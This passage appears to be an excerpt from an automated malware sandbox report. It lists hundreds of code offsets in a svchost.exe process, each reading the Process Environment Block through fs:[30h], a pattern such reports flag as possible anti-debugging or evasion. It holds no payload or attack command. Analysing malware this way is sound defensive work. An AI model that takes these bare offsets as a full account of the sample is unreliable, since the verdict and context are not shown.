            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035D8350 mov ecx, dword ptr fs:[00000030h]2_2_035D8350
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B2349 mov eax, dword ptr fs:[00000030h]2_2_035B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B2349 mov eax, dword ptr fs:[00000030h]2_2_035B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B2349 mov eax, dword ptr fs:[00000030h]2_2_035B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B2349 mov eax, dword ptr fs:[00000030h]2_2_035B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B2349 mov eax, dword ptr fs:[00000030h]2_2_035B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B2349 mov eax, dword ptr fs:[00000030h]2_2_035B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B2349 mov eax, dword ptr fs:[00000030h]2_2_035B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B2349 mov eax, dword ptr fs:[00000030h]2_2_035B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B2349 mov eax, dword ptr fs:[00000030h]2_2_035B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B2349 mov eax, dword ptr fs:[00000030h]2_2_035B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B2349 mov eax, dword ptr fs:[00000030h]2_2_035B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B2349 mov eax, dword ptr fs:[00000030h]2_2_035B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B2349 mov eax, dword ptr fs:[00000030h]2_2_035B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B2349 mov eax, dword ptr fs:[00000030h]2_2_035B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B2349 mov eax, dword ptr fs:[00000030h]2_2_035B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035D437C mov eax, dword ptr fs:[00000030h]2_2_035D437C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0360634F mov eax, dword ptr fs:[00000030h]2_2_0360634F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0352C310 mov ecx, dword ptr fs:[00000030h]2_2_0352C310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03608324 mov eax, dword ptr fs:[00000030h]2_2_03608324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03608324 mov ecx, dword ptr fs:[00000030h]2_2_03608324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03608324 mov eax, dword ptr fs:[00000030h]2_2_03608324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03608324 mov eax, dword ptr fs:[00000030h]2_2_03608324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03550310 mov ecx, dword ptr fs:[00000030h]2_2_03550310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356A30B mov eax, dword ptr fs:[00000030h]2_2_0356A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356A30B mov eax, dword ptr fs:[00000030h]2_2_0356A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356A30B mov eax, dword ptr fs:[00000030h]2_2_0356A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035DE3DB mov eax, dword ptr fs:[00000030h]2_2_035DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035DE3DB mov eax, dword ptr fs:[00000030h]2_2_035DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035DE3DB mov ecx, dword ptr fs:[00000030h]2_2_035DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035DE3DB mov eax, dword ptr fs:[00000030h]2_2_035DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035D43D4 mov eax, dword ptr fs:[00000030h]2_2_035D43D4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035D43D4 mov eax, dword ptr fs:[00000030h]2_2_035D43D4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035EC3CD mov eax, dword ptr fs:[00000030h]2_2_035EC3CD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0353A3C0 mov eax, dword ptr fs:[00000030h]2_2_0353A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0353A3C0 mov eax, dword ptr fs:[00000030h]2_2_0353A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0353A3C0 mov eax, dword ptr fs:[00000030h]2_2_0353A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0353A3C0 mov eax, dword ptr fs:[00000030h]2_2_0353A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0353A3C0 mov eax, dword ptr fs:[00000030h]2_2_0353A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0353A3C0 mov eax, dword ptr fs:[00000030h]2_2_0353A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035383C0 mov eax, dword ptr fs:[00000030h]2_2_035383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035383C0 mov eax, dword ptr fs:[00000030h]2_2_035383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035383C0 mov eax, dword ptr fs:[00000030h]2_2_035383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035383C0 mov eax, dword ptr fs:[00000030h]2_2_035383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B63C0 mov eax, dword ptr fs:[00000030h]2_2_035B63C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0354E3F0 mov eax, dword ptr fs:[00000030h]2_2_0354E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0354E3F0 mov eax, dword ptr fs:[00000030h]2_2_0354E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0354E3F0 mov eax, dword ptr fs:[00000030h]2_2_0354E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035663FF mov eax, dword ptr fs:[00000030h]2_2_035663FF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035403E9 mov eax, dword ptr fs:[00000030h]2_2_035403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035403E9 mov eax, dword ptr fs:[00000030h]2_2_035403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035403E9 mov eax, dword ptr fs:[00000030h]2_2_035403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035403E9 mov eax, dword ptr fs:[00000030h]2_2_035403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035403E9 mov eax, dword ptr fs:[00000030h]2_2_035403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035403E9 mov eax, dword ptr fs:[00000030h]2_2_035403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035403E9 mov eax, dword ptr fs:[00000030h]2_2_035403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035403E9 mov eax, dword ptr fs:[00000030h]2_2_035403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03528397 mov eax, dword ptr fs:[00000030h]2_2_03528397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03528397 mov eax, dword ptr fs:[00000030h]2_2_03528397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03528397 mov eax, dword ptr fs:[00000030h]2_2_03528397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0352E388 mov eax, dword ptr fs:[00000030h]2_2_0352E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0352E388 mov eax, dword ptr fs:[00000030h]2_2_0352E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0352E388 mov eax, dword ptr fs:[00000030h]2_2_0352E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0355438F mov eax, dword ptr fs:[00000030h]2_2_0355438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0355438F mov eax, dword ptr fs:[00000030h]2_2_0355438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0352A250 mov eax, dword ptr fs:[00000030h]2_2_0352A250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03536259 mov eax, dword ptr fs:[00000030h]2_2_03536259
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035EA250 mov eax, dword ptr fs:[00000030h]2_2_035EA250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035EA250 mov eax, dword ptr fs:[00000030h]2_2_035EA250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B8243 mov eax, dword ptr fs:[00000030h]2_2_035B8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B8243 mov ecx, dword ptr fs:[00000030h]2_2_035B8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035E0274 mov eax, dword ptr fs:[00000030h]2_2_035E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035E0274 mov eax, dword ptr fs:[00000030h]2_2_035E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035E0274 mov eax, dword ptr fs:[00000030h]2_2_035E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035E0274 mov eax, dword ptr fs:[00000030h]2_2_035E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035E0274 mov eax, dword ptr fs:[00000030h]2_2_035E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035E0274 mov eax, dword ptr fs:[00000030h]2_2_035E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035E0274 mov eax, dword ptr fs:[00000030h]2_2_035E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035E0274 mov eax, dword ptr fs:[00000030h]2_2_035E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035E0274 mov eax, dword ptr fs:[00000030h]2_2_035E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035E0274 mov eax, dword ptr fs:[00000030h]2_2_035E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035E0274 mov eax, dword ptr fs:[00000030h]2_2_035E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035E0274 mov eax, dword ptr fs:[00000030h]2_2_035E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03534260 mov eax, dword ptr fs:[00000030h]2_2_03534260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03534260 mov eax, dword ptr fs:[00000030h]2_2_03534260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03534260 mov eax, dword ptr fs:[00000030h]2_2_03534260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0352826B mov eax, dword ptr fs:[00000030h]2_2_0352826B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0360625D mov eax, dword ptr fs:[00000030h]2_2_0360625D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0352823B mov eax, dword ptr fs:[00000030h]2_2_0352823B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0353A2C3 mov eax, dword ptr fs:[00000030h]2_2_0353A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0353A2C3 mov eax, dword ptr fs:[00000030h]2_2_0353A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0353A2C3 mov eax, dword ptr fs:[00000030h]2_2_0353A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0353A2C3 mov eax, dword ptr fs:[00000030h]2_2_0353A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0353A2C3 mov eax, dword ptr fs:[00000030h]2_2_0353A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035402E1 mov eax, dword ptr fs:[00000030h]2_2_035402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035402E1 mov eax, dword ptr fs:[00000030h]2_2_035402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035402E1 mov eax, dword ptr fs:[00000030h]2_2_035402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036062D6 mov eax, dword ptr fs:[00000030h]2_2_036062D6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356E284 mov eax, dword ptr fs:[00000030h]2_2_0356E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356E284 mov eax, dword ptr fs:[00000030h]2_2_0356E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B0283 mov eax, dword ptr fs:[00000030h]2_2_035B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B0283 mov eax, dword ptr fs:[00000030h]2_2_035B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B0283 mov eax, dword ptr fs:[00000030h]2_2_035B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035C62A0 mov eax, dword ptr fs:[00000030h]2_2_035C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035C62A0 mov ecx, dword ptr fs:[00000030h]2_2_035C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035C62A0 mov eax, dword ptr fs:[00000030h]2_2_035C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035C62A0 mov eax, dword ptr fs:[00000030h]2_2_035C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035C62A0 mov eax, dword ptr fs:[00000030h]2_2_035C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035C62A0 mov eax, dword ptr fs:[00000030h]2_2_035C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0352C156 mov eax, dword ptr fs:[00000030h]2_2_0352C156
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035C8158 mov eax, dword ptr fs:[00000030h]2_2_035C8158
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03604164 mov eax, dword ptr fs:[00000030h]2_2_03604164
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03604164 mov eax, dword ptr fs:[00000030h]2_2_03604164
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03536154 mov eax, dword ptr fs:[00000030h]2_2_03536154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03536154 mov eax, dword ptr fs:[00000030h]2_2_03536154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035C4144 mov eax, dword ptr fs:[00000030h]2_2_035C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035C4144 mov eax, dword ptr fs:[00000030h]2_2_035C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035C4144 mov ecx, dword ptr fs:[00000030h]2_2_035C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035C4144 mov eax, dword ptr fs:[00000030h]2_2_035C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035C4144 mov eax, dword ptr fs:[00000030h]2_2_035C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035DA118 mov ecx, dword ptr fs:[00000030h]2_2_035DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035DA118 mov eax, dword ptr fs:[00000030h]2_2_035DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035DA118 mov eax, dword ptr fs:[00000030h]2_2_035DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035DA118 mov eax, dword ptr fs:[00000030h]2_2_035DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035F0115 mov eax, dword ptr fs:[00000030h]2_2_035F0115
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035DE10E mov eax, dword ptr fs:[00000030h]2_2_035DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035DE10E mov ecx, dword ptr fs:[00000030h]2_2_035DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035DE10E mov eax, dword ptr fs:[00000030h]2_2_035DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035DE10E mov eax, dword ptr fs:[00000030h]2_2_035DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035DE10E mov ecx, dword ptr fs:[00000030h]2_2_035DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035DE10E mov eax, dword ptr fs:[00000030h]2_2_035DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035DE10E mov eax, dword ptr fs:[00000030h]2_2_035DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035DE10E mov ecx, dword ptr fs:[00000030h]2_2_035DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035DE10E mov eax, dword ptr fs:[00000030h]2_2_035DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035DE10E mov ecx, dword ptr fs:[00000030h]2_2_035DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03560124 mov eax, dword ptr fs:[00000030h]2_2_03560124
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036061E5 mov eax, dword ptr fs:[00000030h]2_2_036061E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035AE1D0 mov eax, dword ptr fs:[00000030h]2_2_035AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035AE1D0 mov eax, dword ptr fs:[00000030h]2_2_035AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035AE1D0 mov ecx, dword ptr fs:[00000030h]2_2_035AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035AE1D0 mov eax, dword ptr fs:[00000030h]2_2_035AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035AE1D0 mov eax, dword ptr fs:[00000030h]2_2_035AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035F61C3 mov eax, dword ptr fs:[00000030h]2_2_035F61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035F61C3 mov eax, dword ptr fs:[00000030h]2_2_035F61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035601F8 mov eax, dword ptr fs:[00000030h]2_2_035601F8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B019F mov eax, dword ptr fs:[00000030h]2_2_035B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B019F mov eax, dword ptr fs:[00000030h]2_2_035B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B019F mov eax, dword ptr fs:[00000030h]2_2_035B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B019F mov eax, dword ptr fs:[00000030h]2_2_035B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0352A197 mov eax, dword ptr fs:[00000030h]2_2_0352A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0352A197 mov eax, dword ptr fs:[00000030h]2_2_0352A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0352A197 mov eax, dword ptr fs:[00000030h]2_2_0352A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03570185 mov eax, dword ptr fs:[00000030h]2_2_03570185
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035EC188 mov eax, dword ptr fs:[00000030h]2_2_035EC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035EC188 mov eax, dword ptr fs:[00000030h]2_2_035EC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035D4180 mov eax, dword ptr fs:[00000030h]2_2_035D4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035D4180 mov eax, dword ptr fs:[00000030h]2_2_035D4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03532050 mov eax, dword ptr fs:[00000030h]2_2_03532050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B6050 mov eax, dword ptr fs:[00000030h]2_2_035B6050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0355C073 mov eax, dword ptr fs:[00000030h]2_2_0355C073
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0354E016 mov eax, dword ptr fs:[00000030h]2_2_0354E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0354E016 mov eax, dword ptr fs:[00000030h]2_2_0354E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0354E016 mov eax, dword ptr fs:[00000030h]2_2_0354E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0354E016 mov eax, dword ptr fs:[00000030h]2_2_0354E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B4000 mov ecx, dword ptr fs:[00000030h]2_2_035B4000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035D2000 mov eax, dword ptr fs:[00000030h]2_2_035D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035D2000 mov eax, dword ptr fs:[00000030h]2_2_035D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035D2000 mov eax, dword ptr fs:[00000030h]2_2_035D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035D2000 mov eax, dword ptr fs:[00000030h]2_2_035D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035D2000 mov eax, dword ptr fs:[00000030h]2_2_035D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035D2000 mov eax, dword ptr fs:[00000030h]2_2_035D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035D2000 mov eax, dword ptr fs:[00000030h]2_2_035D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035D2000 mov eax, dword ptr fs:[00000030h]2_2_035D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035C6030 mov eax, dword ptr fs:[00000030h]2_2_035C6030
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0352A020 mov eax, dword ptr fs:[00000030h]2_2_0352A020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0352C020 mov eax, dword ptr fs:[00000030h]2_2_0352C020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B20DE mov eax, dword ptr fs:[00000030h]2_2_035B20DE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0352C0F0 mov eax, dword ptr fs:[00000030h]2_2_0352C0F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035720F0 mov ecx, dword ptr fs:[00000030h]2_2_035720F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0352A0E3 mov ecx, dword ptr fs:[00000030h]2_2_0352A0E3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035380E9 mov eax, dword ptr fs:[00000030h]2_2_035380E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B60E0 mov eax, dword ptr fs:[00000030h]2_2_035B60E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0353208A mov eax, dword ptr fs:[00000030h]2_2_0353208A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035F60B8 mov eax, dword ptr fs:[00000030h]2_2_035F60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035F60B8 mov ecx, dword ptr fs:[00000030h]2_2_035F60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035280A0 mov eax, dword ptr fs:[00000030h]2_2_035280A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035C80A8 mov eax, dword ptr fs:[00000030h]2_2_035C80A8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03530750 mov eax, dword ptr fs:[00000030h]2_2_03530750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035BE75D mov eax, dword ptr fs:[00000030h]2_2_035BE75D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03572750 mov eax, dword ptr fs:[00000030h]2_2_03572750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03572750 mov eax, dword ptr fs:[00000030h]2_2_03572750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B4755 mov eax, dword ptr fs:[00000030h]2_2_035B4755
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356674D mov esi, dword ptr fs:[00000030h]2_2_0356674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356674D mov eax, dword ptr fs:[00000030h]2_2_0356674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356674D mov eax, dword ptr fs:[00000030h]2_2_0356674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03538770 mov eax, dword ptr fs:[00000030h]2_2_03538770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03540770 mov eax, dword ptr fs:[00000030h]2_2_03540770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03540770 mov eax, dword ptr fs:[00000030h]2_2_03540770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03540770 mov eax, dword ptr fs:[00000030h]2_2_03540770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03540770 mov eax, dword ptr fs:[00000030h]2_2_03540770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03540770 mov eax, dword ptr fs:[00000030h]2_2_03540770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03540770 mov eax, dword ptr fs:[00000030h]2_2_03540770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03540770 mov eax, dword ptr fs:[00000030h]2_2_03540770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03540770 mov eax, dword ptr fs:[00000030h]2_2_03540770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03540770 mov eax, dword ptr fs:[00000030h]2_2_03540770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03540770 mov eax, dword ptr fs:[00000030h]2_2_03540770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03540770 mov eax, dword ptr fs:[00000030h]2_2_03540770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03540770 mov eax, dword ptr fs:[00000030h]2_2_03540770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03530710 mov eax, dword ptr fs:[00000030h]2_2_03530710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03560710 mov eax, dword ptr fs:[00000030h]2_2_03560710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356C700 mov eax, dword ptr fs:[00000030h]2_2_0356C700
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356273C mov eax, dword ptr fs:[00000030h]2_2_0356273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356273C mov ecx, dword ptr fs:[00000030h]2_2_0356273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356273C mov eax, dword ptr fs:[00000030h]2_2_0356273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035AC730 mov eax, dword ptr fs:[00000030h]2_2_035AC730
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356C720 mov eax, dword ptr fs:[00000030h]2_2_0356C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356C720 mov eax, dword ptr fs:[00000030h]2_2_0356C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0353C7C0 mov eax, dword ptr fs:[00000030h]2_2_0353C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B07C3 mov eax, dword ptr fs:[00000030h]2_2_035B07C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035347FB mov eax, dword ptr fs:[00000030h]2_2_035347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035347FB mov eax, dword ptr fs:[00000030h]2_2_035347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035527ED mov eax, dword ptr fs:[00000030h]2_2_035527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035527ED mov eax, dword ptr fs:[00000030h]2_2_035527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035527ED mov eax, dword ptr fs:[00000030h]2_2_035527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035BE7E1 mov eax, dword ptr fs:[00000030h]2_2_035BE7E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035D678E mov eax, dword ptr fs:[00000030h]2_2_035D678E
